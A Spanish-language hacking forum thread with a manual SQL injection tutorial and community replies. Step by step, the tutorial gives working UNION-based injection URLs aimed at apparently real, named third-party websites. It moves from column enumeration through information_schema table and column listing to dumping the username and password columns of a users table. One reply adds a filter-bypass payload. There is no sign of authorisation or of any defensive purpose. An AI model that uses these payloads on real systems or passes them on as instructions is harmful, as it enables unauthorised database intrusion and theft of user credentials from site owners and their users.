comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Tutorial Sqli Manual By Okol

  • 14 Respuestas
  • 7276 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Okol

  • *
  • Underc0der
  • Mensajes: 83
  • Actividad:
    0%
  • Reputación 0
  • Imaginando Programando & Avanzando!
    • Ver Perfil
    • Email
« en: Mayo 20, 2012, 08:51:16 pm »
Hola amigos me ezforze mucho escribiendo este tuto para uds espero les guste :)
Saludos

Sqli Manual

en este caso una variable aki viene siendo

Código: [Seleccionar]
http://www.icvp.mx/enfermedades_detalle.php?id=5
la variable id resultado de la variable 5un ejemplo

Código: [Seleccionar]
http://www.icvp.mx/enfermedades_detalle.php?id=5&ref=google&a=b
vendrian siendo las variables
id
ref
co
a

Código: [Seleccionar]
http://www.icvp.mx/enfermedades_detalle.php?id=5&ref=google.com&g=d&cos=sss
si queeremos comprobar que la variable g es vulnerable donde pondriamos la comilla?

Código: [Seleccionar]
http://www.icvp.mx/enfermedades_detalle.php?id=5&ref=google.com&g=d'&cos=sss
cuando verifiques si una variable es vulnerable pruebas asi:
Código: [Seleccionar]
http://gogo.com/index.php?var=vuln' y http://gogo.com/index.php?var='vulnde las dos maneras pruebas

para saber cuantas columnas tiene podemos poner

Código: [Seleccionar]
http://www.icvp.mx/enfermedades_detalle.php?id=5+order+by+6si ponemos
Código: [Seleccionar]
http://www.icvp.mx/enfermedades_detalle.php?id=5+order+by+7sale ke no existe pero con 6 sale bien quiere decir que tiene 6
columnas

Código: [Seleccionar]
http://www.icvp.mx/enfermedades_detalle.php?id=5+union+select+1,2,3,4,5,6,

salta normal

Código: [Seleccionar]
http://www.icvp.mx/enfermedades_detalle.php?id=5+union+select+1,2,3,4,5,6,7salta error quiere decir que es la 6

notA: una injeccion siempre deve tener -- al final ejemplo
http://www.icvp.mx/enfermedades_detalle.php?id=5+union+select+1,2,3,4,5,6--

tambien se puede hacer

Código: [Seleccionar]
http://www.icvp.mx/enfermedades_detalle.php?id=5+union+select+0,1,2,3,4,5--
(Desde el 1 al 6 o desde 0 al 5) es lo mismo

Para que query se vuelva negativo y sake un error hay ke poner un - antes de la variable vulnerable
ejemplo

http://www.icvp.mx/enfermedades_detalle.php?id=-5+union+select+1,2,3,4,5,6--

Salen unos numeros botados por ahi en este caso es el 4 si le damos click a el error que sale
salen los numeros 4 3 y 6

Cada numero esta involucrado en la injeccion

Código: [Seleccionar]
ejemplo http://www.icvp.mx/enfermedades_detalle.php?id=-5+union+select+0,1,2,3,4,5,--saldrian 5 3 2

esos numeros estan haciendo querys ala db

con este comando database()

se saca el nombre de la db
Como?

sustituimos un numero ke imprime 5 3 o 2 ejemplo

Código: [Seleccionar]
http://www.icvp.mx/enfermedades_detalle.php?id=-5+union+select+0,1,2,3,4,database()--
para ver la version de PHP enves de poner database()

se pone version()

(en otro numero que imprima en estecaso 2) ejemplo

Código: [Seleccionar]
http://www.icvp.mx/enfermedades_detalle.php?id=-5+union+select+0,1,version(),3,4,5--
Para sacar las tablas...

cuando quieras sacar informacion de las tablas nombres o cantidad de tablas lo sacamos de
information_schema.tables


y cuando sea de columnas

information_schema.colums

si queremos sacar las columnas la url seria asi

Código: [Seleccionar]
http://www.tacosaltos.com/index2.php?o=CA&catID=-4+union+select+1,column_name,3,4,5,6+FROM+information_schema.columns--
y las tablas

Código: [Seleccionar]
http://www.tacosaltos.com/index2.php?o=CA&catID=-4+union+select+1,table_name,3,4,5,6+FROM+information_schema.tables--
en algunos casos nos sale solo 1 tabla para ir sabiendo mas tablas

aplicamos LIMIT+1+1--
LIMIT+2+1-- asi succesivamente

Código: [Seleccionar]
http://www.telemedik.com/articulos.php?id=-288+union+select+1,2,3,table_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+FROM+information_schema.tables+LIMIT+4,1--

ya que sacamos las tablas encontramos la tabla usuarios users o algo asi

Código: [Seleccionar]
http://www.telemedik.com/articulos.php?id=-288+union+select+1,2,3,table_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+FROM+information_schema.tables+LIMIT+49,1--
ya tenemos eso ahora que hacemos?
encriptamos la tabla en ascii to hex
les recomiendoe sta web para encryptarlo http://www.seguridadwireless.net/php/conversor-universal-wireless.php

Ok ahora en la url sustituimos los table_name por column_name y en information_schema.tables ponemos
information_schema.columns seguido de un +where+table_name=el codigo encriptado(le agregamos un 0x al inicio y le quitamos los espacios)
y el limit lo ponemos en 1,1
Quedaria algo asi

Código: [Seleccionar]
http://www.telemedik.com/articulos.php?id=-288+union+select+1,2,3,column_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+FROM+information_schema.columns+where+table_name=0x7573657273+LIMIT+1,1--
ven la url? nos tira username ahora moveremos el 1,1 asi 2,1 3,1 sucesivamente hasta que salga pass o algo parecido

Ahora borramos hasta que quede la injeccion normal algo asi

Código: [Seleccionar]
http://www.telemedik.com/articulos.php?id=-288+union+select+1,2,3,column_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+FROM+
donde dice from+ le ponemos el nombre de la tabla (users) quedaria asi

Código: [Seleccionar]
http://www.telemedik.com/articulos.php?id=-288+union+select+1,2,3,column_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+FROM+users--
cambiamos el column_name por el nombre de la columna que queremos ejemplo

Código: [Seleccionar]
http://www.telemedik.com/articulos.php?id=-288+union+select+1,2,3,username,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+FROM+users--
Código: [Seleccionar]
http://www.telemedik.com/articulos.php?id=-288+union+select+1,2,3,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+FROM+users--
Si tienen dudas ami privado amigos
Gracias Dedalo - me enseño como :)
Saludos ;)
« Última modificación: Mayo 22, 2012, 01:05:42 pm por Okol/Ay4x »

Desconectado Cronos

  • *
  • Underc0der
  • Mensajes: 1000
  • Actividad:
    0%
  • Reputación 1
  • Mientras mas se, me doy cuenta de lo poco que se.
    • Ver Perfil
    • Email
  • Skype: cronos.labs
« Respuesta #1 en: Mayo 20, 2012, 09:12:47 pm »
Es muy paresido a la inyeccion sql que yo se. Pero hay muchas formas de hacerlo y con todas llegas al mismo resultado
Muchas gracias por compartirlo!
Saludos,, Cronos.-

Desconectado Okol

  • *
  • Underc0der
  • Mensajes: 83
  • Actividad:
    0%
  • Reputación 0
  • Imaginando Programando & Avanzando!
    • Ver Perfil
    • Email
« Respuesta #2 en: Mayo 20, 2012, 09:15:49 pm »
Si cronos para mi me gusta esta forma de hacerlo se que hay mas pero
mientras no usen tools cualquier forma de sqli manual es buena
Saludos BRO!

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5409
  • Actividad:
    20%
  • Reputación 33
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #3 en: Mayo 20, 2012, 09:21:16 pm »
Excelente aporte man!
Lo que mas vale, es que lo hiciste tu!

Segui asi Okol!

Saludos!


Desconectado Okol

  • *
  • Underc0der
  • Mensajes: 83
  • Actividad:
    0%
  • Reputación 0
  • Imaginando Programando & Avanzando!
    • Ver Perfil
    • Email
« Respuesta #4 en: Mayo 21, 2012, 01:51:02 pm »
Si bro la verdad me ezforze pero lo ise desde 0
Gracias x sus comentarios
SALUDOS

Desconectado Dedalo

  • *
  • Underc0der
  • Mensajes: 117
  • Actividad:
    0%
  • Reputación 0
  • KUSH
    • Ver Perfil
    • Twitter Personal
  • Twitter: https://twitter.com/SeguridadBlanca
« Respuesta #5 en: Mayo 21, 2012, 06:19:49 pm »
Muy bueno okol pero no me fastidiarían los gr33tz bro... tu sabes a que me refiero ¬¬


Saludos,
Dedalo

Desconectado Okol

  • *
  • Underc0der
  • Mensajes: 83
  • Actividad:
    0%
  • Reputación 0
  • Imaginando Programando & Avanzando!
    • Ver Perfil
    • Email
« Respuesta #6 en: Mayo 21, 2012, 09:39:53 pm »
claro hermano disculpa ya te pongo :$ tu me enseñaste todo jajaja

Desconectado fenix2000

  • *
  • Underc0der
  • Mensajes: 13
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #7 en: Mayo 21, 2012, 10:43:20 pm »
Excelente tutorial 8) . Felicitaciones Okol

Desconectado Cronos

  • *
  • Underc0der
  • Mensajes: 1000
  • Actividad:
    0%
  • Reputación 1
  • Mientras mas se, me doy cuenta de lo poco que se.
    • Ver Perfil
    • Email
  • Skype: cronos.labs
« Respuesta #8 en: Mayo 22, 2012, 09:37:41 am »
Okol una cosa que note. Cuando dices "..  (Desde el 1 al 5 o desde 0 al 6) es lo mismo .." No seria (Desde el 1 al 6 o desde 0 al 5)?
Saludos,, Cronos.-

Desconectado Okol

  • *
  • Underc0der
  • Mensajes: 83
  • Actividad:
    0%
  • Reputación 0
  • Imaginando Programando & Avanzando!
    • Ver Perfil
    • Email
« Respuesta #9 en: Mayo 22, 2012, 01:04:36 pm »
siiii disculpa del 1 al 6 o del 0 al 5 disculpame hermano ya lo corrijo esque no lo habia leido bien antes e postear

Desconectado 5TU4RT

  • *
  • Underc0der
  • Mensajes: 111
  • Actividad:
    0%
  • Reputación 0
  • Si se puede imaginar... se puede programar.!
    • Ver Perfil
    • Underc0de
    • Email
« Respuesta #10 en: Mayo 22, 2012, 03:00:10 pm »
Te complemento okol... Quizas debes especificar y/o aclarar mas lo de los comentarios al final de la injection SQL... porque en los ejemplos en donde aplicas el order by no pusiste los comentarios!!!

Le puedes añadir a tu post otros posibles comentarios como en vez de "--"  /* y en ves de "+" /**/
porque aveces pasa que con un comentario funciona y con otro no...

Tambien le puedes añadir una forma de bypass, ya que aveces al iniciar poniendo ej:

www.site.com/index.php?id=1+order+by+9999--

Puede que no te muestre nada...

Una forma de bypass seria:

www.site.com/index.php?id=1'+order+by+20--+-


Bno, solo digo eso por complementar...!!!


SALu2

Si se puede imaginar... se puede programar.!

Desconectado Chris

  • *
  • Underc0der
  • Mensajes: 8
  • Actividad:
    0%
  • Reputación 0
  • Surf n' Turf
    • Ver Perfil
« Respuesta #11 en: Julio 13, 2013, 11:25:32 pm »
Buen aporte!
Se agradece

Desconectado The Swash

  • *
  • Underc0der
  • Mensajes: 18
  • Actividad:
    0%
  • Reputación 0
  • Return to reversing!
    • Ver Perfil
    • Email
  • Skype: the_swash@outlook.com
« Respuesta #12 en: Julio 14, 2013, 10:52:23 pm »
Está bien que lo hiciste tú y no vengo más que a decirte que realmente dan dolor de ojos algunos errores ortográficos, realmente deberías esmerarte más en esa parte porque le quita presentación y seriedad.

Saludos.

Desconectado hum4n3xpl01t

  • *
  • Underc0der
  • Mensajes: 44
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #13 en: Julio 16, 2013, 09:06:11 pm »
Se agradece el tiempo y dedicación por tratar de ser explicito en tu explicación, muy interesante y sirve para complementar mucho lo ya aprendido gracias al foro.

Gracias (Y)

Desconectado PW[N]ED

  • *
  • Underc0der
  • Mensajes: 14
  • Actividad:
    0%
  • Reputación 0
  • PW[N]ED underc0de.-!
    • Ver Perfil
  • Skype: the.joker.crack
« Respuesta #14 en: Julio 22, 2013, 10:43:54 am »
quuuuuuuueeeeeeee buen tuto :D

 

¿Te gustó el post? COMPARTILO!



Tutorial de un exploit local BOF con bypass DEP usando ROP by PerverthsO

Iniciado por PerverthsO

Respuestas: 0
Vistas: 1693
Último mensaje Marzo 04, 2013, 01:40:08 pm
por PerverthsO
Explotación del Heap a través de la macro UNLINK (TUTORIAL)

Iniciado por l3x4

Respuestas: 4
Vistas: 2835
Último mensaje Agosto 06, 2018, 05:52:45 pm
por KiddArabic
[Tutorial] Vulnerabilidad CSRF By ShadinessDark [Colaboracion de Zero Bits]

Iniciado por dracko.rx

Respuestas: 0
Vistas: 1996
Último mensaje Febrero 24, 2010, 03:24:51 pm
por dracko.rx
Full Source Disclosure [Tutorial Basico]

Iniciado por Pr0ph3t

Respuestas: 1
Vistas: 2674
Último mensaje Mayo 08, 2012, 05:49:49 pm
por baron.power
Tutorial MySQL Injection Double Query.

Iniciado por WilyXem

Respuestas: 4
Vistas: 3225
Último mensaje Febrero 01, 2013, 12:36:20 pm
por alexander1712